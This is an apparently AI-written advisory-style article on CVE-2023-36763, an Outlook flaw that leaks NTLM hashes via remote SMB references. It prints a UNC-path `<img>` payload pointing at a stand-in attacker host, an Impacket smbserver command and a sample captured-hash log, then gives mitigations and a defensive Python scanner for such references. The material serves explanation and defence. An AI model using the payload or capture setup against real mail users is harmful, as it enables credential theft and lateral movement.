CVE-2023-36763 - Inside the Microsoft Outlook Information Disclosure Vulnerability
---
In September 2023, Microsoft patched a security hole in Outlook that attackers were actively exploiting. The flaw, CVE-2023-36763, raised concerns because it let attackers read sensitive information from Outlook with very little user interaction. Here’s a deep dive into what this vulnerability is, how it can be exploited, and what you need to do to stay safe.
What Is CVE-2023-36763?
CVE-2023-36763 is an information disclosure vulnerability in Microsoft Outlook. This means it allows attackers to access information they shouldn’t, by tricking Outlook into leaking it. The risk was classified as “important” by Microsoft, but security experts saw it as urgent because attacks were already happening in the wild.
Microsoft Outlook for Microsoft 365
Older versions and the web-based Outlook may not be affected in the same way, but check Microsoft's advisory for the version you run.
How Does the Exploit Work?
An attacker sends you a specially crafted email. All you have to do is preview or open the email in Outlook. You don’t have to click anything. The email includes a link or object that Outlook tries to load.
The flaw lies in Outlook's handling of external files or resources. By referencing a remote SMB (Server Message Block) file share, the attacker gets Outlook to try to access that share automatically. When it does, Windows sends your NTLM hash (a kind of password fingerprint used in Windows authentication) to the attacker's remote server.
1. The attacker sends you the crafted email.
2. You preview or open it in Outlook.
3. Outlook tries to load the linked image or file.
4. Your computer automatically tries to authenticate with the attacker's remote server, offering up your NTLM hash.
If the attacker captures your NTLM hash, they can use it in pass-the-hash attacks, or try to crack it offline for your plain password.
Proof-of-Concept: Code Snippet
Security researchers released proof-of-concept code showing how easy it is to trigger the bug. For example, you can create an email with a remote SMB link in the body, like this:
```html
<img src="\\attacker-host\share\image.png" />
```
When this email is opened, Outlook fetches the image by connecting to the attacker's SMB server.
Example: An Impacket SMB Server That Captures Credentials
Attackers often use tools like Impacket's smbserver.py to catch credentials:
```shell
python3 smbserver.py share /tmp/share
```
When Outlook tries to access \\attacker-ip\share\anything, the attacker's server logs your hash:
```text
[*] Incoming connection ('192.168.1.15', 49670)
[*] AUTHENTICATE_MESSAGE (user: JOHNDOE, domain: COMPANY)
[*] NTLM response captured: 010100...
```
Real-World Attack Scenario
1. Phishing Email: An attacker sends a targeted email using a remote SMB path in an embedded image, attachment link, or even a calendar invite.
2. Credential Theft: Outlook automatically sends the user's NTLM hash to the attacker.
3. Lateral Movement: The attacker uses these hashes to move around the network or try to crack user passwords offline.
References and Further Reading
- Microsoft Security Guide: CVE-2023-36763
- Huntress Labs: Vulnerabilities and Attacks Using NTLM Hashes
- Impacket Tools on GitHub
How to Protect Yourself
1. Patch Now: Microsoft released a security update for Outlook in September 2023. Run Windows Update or download from Microsoft’s official page.
2. Block Outbound SMB Traffic: Block TCP ports 445 and 139 to the internet in your firewall. This stops your NTLM hashes leaking out to attackers’ servers.
3. Disable NTLM Authentication if Possible: Use stronger authentication methods (like Kerberos) if your environment allows it.
4. Beware of Suspicious Emails: Stay cautious about unexpected emails — even those that only show images or calendar invites.
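A defender-side counterpart to the `<img src="\\...">` trigger shown earlier and to the protection list above: an added example, not code from the original page or from any vendor, that scans an HTML mail body for UNC and `file:` references that would make a client reach out to a remote SMB host, the kind of check a mail gateway or a triage script can run. The sample body and host names are constructed; it goes slightly beyond the page's `<img>` case by also inspecting `href`, `background` and similar attributes and the `file://host/share` form.

```python
import re
from html.parser import HTMLParser

# Attributes whose value a mail client fetches automatically or on a click.
FETCH_ATTRS = {"src", "href", "background", "poster", "data", "action"}

# A UNC path (\\host\share\...) or a file: URL naming a remote host
# (file://host/share/...); group 1 is the host. Protocol-relative http
# links (//host/...) and local file:///C:/... paths are not matched.
REMOTE_FILE_RE = re.compile(r"^\s*(?:file:[\\/]{2}|\\\\)([^\\/\s]+)[\\/]",
                            re.IGNORECASE)

# Constructed sample: the page's <img> trigger, a file: link, and benign
# https / cid: references that must not be flagged.
SAMPLE = (r'<html><body><p>Invoice attached.</p>'
          r'<img src="\\attacker-host\share\image.png" />'
          r'<a href="file://attacker-host/share/doc.docx">open</a>'
          r'<img src="https://cdn.example.com/logo.png">'
          r'<img src="cid:part1@mail"></body></html>')


def remote_file_host(value):
    """Host a UNC/file: reference points at; None for anything else."""
    m = REMOTE_FILE_RE.match(value)
    return m.group(1).lower() if m else None


class _RemoteRefFinder(HTMLParser):
    # HTMLParser decodes entities before we see them, so an obfuscated
    # &#92;&#92;host&#92;share value is inspected as a plain UNC path.
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, host, raw value)

    def handle_starttag(self, tag, attrs):  # also called for <img ... />
        for name, value in attrs:
            if value is None or name.lower() not in FETCH_ATTRS:
                continue
            host = remote_file_host(value)
            if host:
                self.findings.append((tag.lower(), name.lower(), host, value.strip()))


def find_remote_file_refs(html_body):
    """Every reference in an HTML mail body that would make the client
    open an SMB (or WebDAV) connection to a remote host."""
    finder = _RemoteRefFinder()
    finder.feed(html_body)
    finder.close()
    return finder.findings
```

Hosts returned this way can be fed straight into a block list or an alert, and a body with an empty result contains no such trigger.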
Final Thoughts
CVE-2023-36763 shows how a little oversight (like how Outlook handles remote images) can lead to big problems. Attackers are always looking for simple ways to get in, and sometimes, all it takes is an email and a preview. Keep your Outlook client updated and educate users about the risks lurking in unexpected places.
Stay safe — patch early and often!
*Content exclusive — Written for your security awareness by AI, referencing only primary sources and current security best practices.*
Timeline
Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC